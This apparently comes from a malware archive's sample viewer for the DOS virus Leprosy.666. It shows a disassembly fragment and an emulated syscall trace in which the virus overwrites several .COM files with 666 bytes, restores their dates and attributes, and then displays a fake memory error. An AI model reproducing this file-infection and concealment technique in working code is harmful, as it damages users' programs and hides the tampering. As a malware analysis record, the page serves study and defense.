Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.666.k

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:40.320777295Z 44 PC: 12ba6 | Get time 0x12ba6: cmp byte ptr [0x103], 0
0x12bab: je 0x12bb2
0x12bad: cmp dh, 0xf
0x12bb0: jg 0x12bbb
0x12bb2: cmp dl, 0
0x12bb5: je 0x12ba2
0x12bb7: mov byte ptr [0x103], dl
0x12bbb: mov byte ptr [0x257], 0
0x12bc0: mov byte ptr [0x258], 4
0x12bc5: mov byte ptr [0x261], 0
0x12bca: mov cx, 0x27
0x12bcd: mov dx, 0x134
0x12bd0: mov ah, 0x4e
0x12bd2: int 0x21
0x12bd4: cmp ax, 0x12
0x12bd7: je 0x12bdc
0x12bd9: call 0x12bfe
0x12bdc: mov cx, 0x27
0x12bdf: mov dx, 0x13a
0x12be2: mov ah, 0x4e
2018-12-17T22:45:40.323888308Z 78 PC: 12bd4 | Find first file
2018-12-17T22:45:40.332918318Z 78 PC: 12be6 | Find first file
2018-12-17T22:45:40.339698822Z 67 PC: 12c1f | Get or set file attributes
2018-12-17T22:45:40.355728448Z 61 PC: 12c25 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:40.363733723Z 63 PC: 12c34 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:45:40.37098373Z 62 PC: 12c68 | Close file
2018-12-17T22:45:40.373430656Z 61 PC: 12c71 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:40.383323155Z 64 PC: 12a5d | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:45:40.393189014Z 87 PC: 12c99 | Get or set file date and time
2018-12-17T22:45:40.395283919Z 62 PC: 12ca1 | Close file
2018-12-17T22:45:40.40678012Z 67 PC: 12cae | Get or set file attributes
2018-12-17T22:45:40.418970315Z 79 PC: 12c58 | Find next file
2018-12-17T22:45:40.421898425Z 67 PC: 12c1f | Get or set file attributes
2018-12-17T22:45:40.433364771Z 61 PC: 12c25 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:40.440602604Z 63 PC: 12c34 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:45:40.44843781Z 62 PC: 12c68 | Close file
2018-12-17T22:45:40.451214294Z 61 PC: 12c71 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:40.459256489Z 64 PC: 12a5d | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:45:40.487170295Z 87 PC: 12c99 | Get or set file date and time
2018-12-17T22:45:40.494609417Z 62 PC: 12ca1 | Close file
2018-12-17T22:45:40.508720129Z 67 PC: 12cae | Get or set file attributes
2018-12-17T22:45:40.514491307Z 79 PC: 12c58 | Find next file
2018-12-17T22:45:40.517635924Z 67 PC: 12c1f | Get or set file attributes
2018-12-17T22:45:40.543005912Z 61 PC: 12c25 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:40.550388798Z 63 PC: 12c34 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:45:40.558395336Z 62 PC: 12c68 | Close file
2018-12-17T22:45:40.56136329Z 61 PC: 12c71 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:40.569002427Z 64 PC: 12a5d | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:45:40.597997504Z 87 PC: 12c99 | Get or set file date and time
2018-12-17T22:45:40.601293245Z 62 PC: 12ca1 | Close file
2018-12-17T22:45:40.638658752Z 67 PC: 12cae | Get or set file attributes
2018-12-17T22:45:40.643768389Z 79 PC: 12c58 | Find next file
2018-12-17T22:45:40.647703539Z 67 PC: 12c1f | Get or set file attributes
2018-12-17T22:45:40.659963385Z 61 PC: 12c25 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:45:40.667426121Z 63 PC: 12c34 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:45:40.675788928Z 62 PC: 12c68 | Close file
2018-12-17T22:45:40.67809547Z 61 PC: 12c71 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:45:40.685689672Z 64 PC: 12a5d | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:45:40.705430759Z 87 PC: 12c99 | Get or set file date and time
2018-12-17T22:45:40.709075855Z 62 PC: 12ca1 | Close file
2018-12-17T22:45:40.795922265Z 67 PC: 12cae | Get or set file attributes
2018-12-17T22:45:40.802004819Z 9 PC: 12cce | Display string (String= ' Program too big to fit in memory')
2018-12-17T22:45:40.808372299Z 76 PC: 12cd2 | Terminate with return code (Return code = '36')